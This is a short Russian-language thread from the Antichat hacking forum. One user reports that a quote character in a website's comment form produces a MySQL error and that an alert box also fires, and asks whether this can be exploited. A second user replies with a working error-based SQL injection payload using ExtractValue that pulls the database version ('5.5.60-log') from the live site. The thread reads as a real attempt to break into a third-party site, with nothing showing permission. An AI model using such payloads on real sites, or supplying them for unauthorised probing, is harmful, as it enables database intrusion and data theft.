HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.03.2020, 11:38
0xd098d0b3d0
Познающий
Регистрация: 26.10.2012
Сообщений: 54
С нами: 7129046

Репутация: 0
По умолчанию

Если вставить кавычку в комментарий, на сайте

И отправить, то выдает вот это

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/admin/web//public_html/inc/add_comment.php on line 47

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'asdf asdfas dfad sf' and site_id='0'' at line 1

Причем, если вставить alert, то он выдаст его в отдельном окошке.

Вопрос, можно ли раскрутить, или это просто отображается ошибка
 
Ответить с цитированием

  #2  
Старый 23.03.2020, 15:44
WallHack
Постоянный
Регистрация: 18.07.2013
Сообщений: 293
С нами: 6747446

Репутация: 32
По умолчанию

Это error based

Код:
fgggggggggggggg' ||(ExtractValue(1,concat(0x3a,(select(version())))))#
Вверху: XPATH syntax error: ':5.5.60-log'
 
Ответить с цитированием

  #3  
Старый 23.03.2020, 20:53
0xd098d0b3d0
Познающий
Регистрация: 26.10.2012
Сообщений: 54
С нами: 7129046

Репутация: 0
По умолчанию

Цитата:
Сообщение от WallHack  

Это error based
Код:
fgggggggggggggg' ||(ExtractValue(1,concat(0x3a,(select(version())))))#
Вверху:
XPATH syntax error: ':5.5.60-log
'
Если не сложно, можно небольшую расшифровочку.

Я так понимаю, что текст до кавычки, это чтобы обойти проверку на длинну комментария, дальше идет ExtractValue, как оно взаимодействует? и зачем решетка в конце строки. Остальное понятно.
 
Ответить с цитированием

  #4  
Старый 24.03.2020, 12:59
kris990
Новичок
Регистрация: 08.10.2019
Сообщений: 28
С нами: 3474326

Репутация: 0
По умолчанию

 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.